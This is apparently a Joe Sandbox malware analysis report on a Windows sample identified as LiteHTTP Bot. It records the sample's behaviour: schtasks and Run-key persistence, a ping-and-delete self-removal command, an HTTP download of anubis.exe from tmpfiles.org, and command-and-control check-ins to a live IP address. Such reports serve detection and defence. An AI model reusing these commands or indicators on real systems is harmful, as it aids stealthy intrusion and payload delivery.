Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
random.exe

Overview

General Information

Sample name:random.exe
Analysis ID:1592066
MD5:e2e13615dffaff99a1d0cd9d32c4cf80
SHA1:6b804aad52f0dfda2303dde5c0e641bb20f14fc2
SHA256:71cfdbe5a32fb5cb2a5eff926c8b9000b231f4990b258872e7cf3a0e4c46bccf
Tags:exemalwaretrojanuser-Joker
Infos:

Detection

LiteHTTP Bot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LiteHTTP Bot
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Self deletion via cmd or bat file
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • random.exe (PID: 1380 cmdline: "C:\Users\user\Desktop\random.exe" MD5: E2E13615DFFAFF99A1D0CD9D32C4CF80)
    • schtasks.exe (PID: 6060 cmdline: "schtasks.exe" /Create /SC ONLOGON /TN "TaskHelper" /TR "C:\Users\user\Desktop\random.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cEp3d38.exe (PID: 5876 cmdline: "C:\Users\user\AppData\Roaming\cEp3d38.exe" MD5: E2E13615DFFAFF99A1D0CD9D32C4CF80)
    • cmd.exe (PID: 4496 cmdline: "cmd.exe" /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del "C:\Users\user\Desktop\random.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 4900 cmdline: ping 1.1.1.1 -n 1 -w 4000 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • random.exe (PID: 1692 cmdline: C:\Users\user\Desktop\random.exe MD5: E2E13615DFFAFF99A1D0CD9D32C4CF80)
  • random.exe (PID: 4516 cmdline: "C:\Users\user\Desktop\random.exe" MD5: E2E13615DFFAFF99A1D0CD9D32C4CF80)
  • random.exe (PID: 5452 cmdline: "C:\Users\user\Desktop\random.exe" MD5: E2E13615DFFAFF99A1D0CD9D32C4CF80)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
random.exeJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
    random.exeMALWARE_Win_CoreBotDetects CoreBotditekSHen
    • 0x6f3e:$v1_1: newtask
    • 0x5cd0:$v1_7: DownloadFile
    • 0x6eb8:$cnc1: &os=
    • 0x6ec2:$cnc2: &pv=
    • 0x6ecc:$cnc3: &ip=
    • 0x6ed6:$cnc4: &cn=
    • 0x6ee0:$cnc5: &lr=
    • 0x6eea:$cnc6: &ct=
    • 0x6ef4:$cnc7: &bv=
    • 0x6f4e:$cnc8: &op=
    • 0x6f5c:$cnc9: &td=
    • 0x6f70:$cnc10: &uni=

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\OneDrive\jdownloader.exeJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
        C:\Users\user\OneDrive\jdownloader.exeMALWARE_Win_CoreBotDetects CoreBotditekSHen
        • 0x6f3e:$v1_1: newtask
        • 0x5cd0:$v1_7: DownloadFile
        • 0x6eb8:$cnc1: &os=
        • 0x6ec2:$cnc2: &pv=
        • 0x6ecc:$cnc3: &ip=
        • 0x6ed6:$cnc4: &cn=
        • 0x6ee0:$cnc5: &lr=
        • 0x6eea:$cnc6: &ct=
        • 0x6ef4:$cnc7: &bv=
        • 0x6f4e:$cnc8: &op=
        • 0x6f5c:$cnc9: &td=
        • 0x6f70:$cnc10: &uni=
        C:\Users\user\OneDrive\windows multimedia platform.exeJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
          C:\Users\user\OneDrive\windows multimedia platform.exeMALWARE_Win_CoreBotDetects CoreBotditekSHen
          • 0x6f3e:$v1_1: newtask
          • 0x5cd0:$v1_7: DownloadFile
          • 0x6eb8:$cnc1: &os=
          • 0x6ec2:$cnc2: &pv=
          • 0x6ecc:$cnc3: &ip=
          • 0x6ed6:$cnc4: &cn=
          • 0x6ee0:$cnc5: &lr=
          • 0x6eea:$cnc6: &ct=
          • 0x6ef4:$cnc7: &bv=
          • 0x6f4e:$cnc8: &op=
          • 0x6f5c:$cnc9: &td=
          • 0x6f70:$cnc10: &uni=
          C:\Users\user\OneDrive\autoit3.exeJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
            Click to see the 45 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000001.00000002.2010343903.00000000069B9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
              00000001.00000000.1340004308.0000000000CF2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
                Process Memory Space: random.exe PID: 1380JoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  1.0.random.exe.cf0000.0.unpackJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
                    1.0.random.exe.cf0000.0.unpackMALWARE_Win_CoreBotDetects CoreBotditekSHen
                    • 0x6f3e:$v1_1: newtask
                    • 0x5cd0:$v1_7: DownloadFile
                    • 0x6eb8:$cnc1: &os=
                    • 0x6ec2:$cnc2: &pv=
                    • 0x6ecc:$cnc3: &ip=
                    • 0x6ed6:$cnc4: &cn=
                    • 0x6ee0:$cnc5: &lr=
                    • 0x6eea:$cnc6: &ct=
                    • 0x6ef4:$cnc7: &bv=
                    • 0x6f4e:$cnc8: &op=
                    • 0x6f5c:$cnc9: &td=
                    • 0x6f70:$cnc10: &uni=

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Startup Folder File Write
                    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\random.exe, ProcessId: 1380, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\random.lnk
                    Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Desktop\random.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\random.exe, ProcessId: 1380, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\TaskHelper

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-15T18:11:03.186880+010028299091Malware Command and Control Activity Detected192.168.2.95923987.120.126.580TCP
                    2025-01-15T18:11:05.950275+010028299091Malware Command and Control Activity Detected192.168.2.95923987.120.126.580TCP
                    2025-01-15T18:11:06.343152+010028299091Malware Command and Control Activity Detected192.168.2.95923987.120.126.580TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-15T18:11:03.186880+010028197051Malware Command and Control Activity Detected192.168.2.95923987.120.126.580TCP
                    2025-01-15T18:11:05.950275+010028197051Malware Command and Control Activity Detected192.168.2.95923987.120.126.580TCP
                    2025-01-15T18:11:06.343152+010028197051Malware Command and Control Activity Detected192.168.2.95923987.120.126.580TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-15T18:11:02.890852+010028302381A Network Trojan was detected192.168.2.95923987.120.126.580TCP
                    2025-01-15T18:11:05.693290+010028302381A Network Trojan was detected192.168.2.95923987.120.126.580TCP
                    2025-01-15T18:11:06.123167+010028302381A Network Trojan was detected192.168.2.95923987.120.126.580TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: random.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\random.exeAvira: detection malicious, Label: HEUR/AGEN.1351936
                    Source: C:\Users\user\OneDrive\microsoft.exeAvira: detection malicious, Label: HEUR/AGEN.1351936
                    Source: C:\Users\user\OneDrive\autoit3.exeAvira: detection malicious, Label: HEUR/AGEN.1351936
                    Source: C:\Users\user\OneDrive\java.exeAvira: detection malicious, Label: HEUR/AGEN.1351936
                    Source: C:\Users\user\OneDrive\jdownloader.exeAvira: detection malicious, Label: HEUR/AGEN.1351936
                    Source: C:\Users\user\OneDrive\internet explorer.exeAvira: detection malicious, Label: HEUR/AGEN.1351936
                    Source: C:\Users\user\OneDrive\msecache.exeAvira: detection malicious, Label: HEUR/AGEN.1351936
                    Source: C:\Users\user\OneDrive\common files.exeAvira: detection malicious, Label: HEUR/AGEN.1351936
                    Source: C:\Users\user\OneDrive\mozilla maintenance service.exeAvira: detection malicious, Label: HEUR/AGEN.1351936
                    Source: C:\Users\user\OneDrive\reference assemblies.exeAvira: detection malicious, Label: HEUR/AGEN.1351936
                    Source: C:\Users\user\OneDrive\microsoft.net.exeAvira: detection malicious, Label: HEUR/AGEN.1351936
                    Source: C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exeAvira: detection malicious, Label: HEUR/AGEN.1351936
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeAvira: detection malicious, Label: HEUR/AGEN.1351936
                    Source: C:\Users\user\OneDrive\google.exeAvira: detection malicious, Label: HEUR/AGEN.1351936
                    Source: C:\Users\user\OneDrive\microsoft office.exeAvira: detection malicious, Label: HEUR/AGEN.1351936
                    Source: C:\Users\user\OneDrive\msbuild.exeAvira: detection malicious, Label: HEUR/AGEN.1351936
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\AppData\Roaming\random.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\OneDrive\autoit3.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\OneDrive\common files.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\OneDrive\google.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\OneDrive\internet explorer.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\OneDrive\java.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\OneDrive\jdownloader.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\OneDrive\microsoft office.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\OneDrive\microsoft.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\OneDrive\microsoft.net.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\OneDrive\mozilla maintenance service.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\OneDrive\msbuild.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\OneDrive\msecache.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\OneDrive\reference assemblies.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\OneDrive\windows defender.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\OneDrive\windows mail.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\OneDrive\windows media player.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\OneDrive\windows multimedia platform.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\OneDrive\windows nt.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\OneDrive\windows photo viewer.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\OneDrive\windows portable devices.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\OneDrive\windows sidebar.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\OneDrive\windowspowershell.exeReversingLabs: Detection: 21%
                    Multi AV Scanner detection for submitted file
                    Source: random.exeReversingLabs: Detection: 21%
                    Source: random.exeVirustotal: Detection: 31%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\random.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\microsoft.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\autoit3.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\java.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\jdownloader.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\internet explorer.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\msecache.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\common files.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\mozilla maintenance service.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\reference assemblies.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\microsoft.net.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\google.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\microsoft office.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\msbuild.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: random.exeJoe Sandbox ML: detected
                    Source: random.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.9:59241 version: TLS 1.2
                    Source: random.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\Badus\OneDrive\Desktop\Bot1.0.7\Bot\LiteHTTP\obj\Debug\Anubis.pdb source: random.exe, windows photo viewer.exe.1.dr, windows nt.exe.1.dr, windows sidebar.exe.1.dr, random.exe.1.dr, microsoft.exe.1.dr, autoit3.exe.1.dr, java.exe.1.dr, windows mail.exe.1.dr, windowspowershell.exe.1.dr, jdownloader.exe.1.dr, internet explorer.exe.1.dr, msecache.exe.1.dr, common files.exe.1.dr, windows multimedia platform.exe.1.dr, mozilla maintenance service.exe.1.dr, windows defender.exe.1.dr, reference assemblies.exe.1.dr, windows media player.exe.1.dr, microsoft.net.exe.1.dr, mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe.1.dr, cEp3d38.exe.1.dr, google.exe.1.dr, microsoft office.exe.1.dr, msbuild.exe.1.dr, windows portable devices.exe.1.dr
                    Source: Binary string: C:\Users\Badus\OneDrive\Desktop\Bot1.0.7\Bot\LiteHTTP\obj\Debug\Anubis.pdbd source: random.exe, windows photo viewer.exe.1.dr, windows nt.exe.1.dr, windows sidebar.exe.1.dr, random.exe.1.dr, microsoft.exe.1.dr, autoit3.exe.1.dr, java.exe.1.dr, windows mail.exe.1.dr, windowspowershell.exe.1.dr, jdownloader.exe.1.dr, internet explorer.exe.1.dr, msecache.exe.1.dr, common files.exe.1.dr, windows multimedia platform.exe.1.dr, mozilla maintenance service.exe.1.dr, windows defender.exe.1.dr, reference assemblies.exe.1.dr, windows media player.exe.1.dr, microsoft.net.exe.1.dr, mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe.1.dr, cEp3d38.exe.1.dr, google.exe.1.dr, microsoft office.exe.1.dr, msbuild.exe.1.dr, windows portable devices.exe.1.dr
                    Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then jmp 01512EBEh1_2_01512DE8
                    Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then jmp 01512FECh1_2_01512FE0
                    Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then jmp 01512FECh1_2_01512ED8
                    Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then jmp 01512FECh1_2_01512EC7

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.9:59239 -> 87.120.126.5:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.9:59239 -> 87.120.126.5:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.9:59239 -> 87.120.126.5:80
                    Uses ping.exe to check the status of other devices and networks
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                    Source: global trafficTCP traffic: 192.168.2.9:59230 -> 162.159.36.2:53
                    Source: global trafficHTTP traffic detected: GET /dl/19480319/anubis.exe HTTP/1.1Host: tmpfiles.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /dl/19480319/anubis.exe HTTP/1.1Host: tmpfiles.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 104.21.21.16 104.21.21.16
                    Source: Joe Sandbox ViewASN Name: UNACS-AS-BG8000BurgasBG UNACS-AS-BG8000BurgasBG
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /dl/19480319/anubis.exe HTTP/1.1Host: tmpfiles.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /dl/19480319/anubis.exe HTTP/1.1Host: tmpfiles.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: tmpfiles.org
                    Source: unknownHTTP traffic detected: POST /VmCetSC7/page.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3Host: 87.120.126.5Content-Length: 367Expect: 100-continueConnection: Keep-Alive
                    Source: random.exe, 00000001.00000002.2008201035.000000000339F000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.00000000032CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.120.126.5
                    Source: random.exe, 00000001.00000002.2008201035.0000000003098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.120.126.5/VmCetSC7/page.php
                    Source: random.exe, 00000001.00000002.2008201035.000000000339F000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.00000000033A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.120.126.5/VmCetSC7/page.phpP
                    Source: random.exe, 00000001.00000002.2008201035.00000000031A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: random.exe, 00000001.00000002.2008201035.0000000003365000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.0000000003326000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.0000000003315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tmpfiles.org
                    Source: random.exe, 00000001.00000002.2008201035.0000000003315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tmpfiles.org/dl/19480319/anubis.exe
                    Source: random.exe, 00000001.00000002.2008201035.0000000003365000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.0000000003326000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tmpfiles.orgd
                    Source: random.exe, 00000001.00000002.2008201035.0000000003365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tmpfiles.org
                    Source: random.exe, 00000001.00000002.2008201035.0000000003365000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.0000000003326000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.00000000032E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tmpfiles.org/dl/19480319/anubis.exe
                    Source: unknownNetwork traffic detected: HTTP traffic on port 59241 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59241
                    Source: unknownHTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.9:59241 version: TLS 1.2

                    Operating System Destruction

                    barindex
                    Protects its processes via BreakOnTermination flag
                    Source: C:\Users\user\Desktop\random.exeProcess information set: 01 00 00 00 Jump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: random.exe, type: SAMPLEMatched rule: Detects CoreBot Author: ditekSHen
                    Source: 1.0.random.exe.cf0000.0.unpack, type: UNPACKEDPEMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\jdownloader.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\windows multimedia platform.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\autoit3.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\windowspowershell.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\reference assemblies.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\windows mail.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\common files.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\microsoft.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\windows defender.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\windows sidebar.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\windows photo viewer.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\msecache.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\java.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\internet explorer.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\mozilla maintenance service.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\windows nt.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\random.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\microsoft.net.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\windows media player.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\google.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\microsoft office.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\windows portable devices.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\OneDrive\msbuild.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe, type: DROPPEDMatched rule: Detects CoreBot Author: ditekSHen
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_015130101_2_01513010
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_015113901_2_01511390
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_0151E9701_2_0151E970
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_055375D81_2_055375D8
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_0553F6981_2_0553F698
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_055388281_2_05538828
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_055312981_2_05531298
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_05531AB81_2_05531AB8
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_05531AA91_2_05531AA9
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_06B512781_2_06B51278
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_06B547881_2_06B54788
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_06B539181_2_06B53918
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_06B534DF1_2_06B534DF
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_06B500401_2_06B50040
                    Source: C:\Users\user\Desktop\random.exeCode function: 1_2_06B535501_2_06B53550
                    Source: random.exe, 00000001.00000002.2007218382.00000000012EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs random.exe
                    Source: random.exe, 00000001.00000002.2010343903.00000000069B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAnubis.exeD vs random.exe
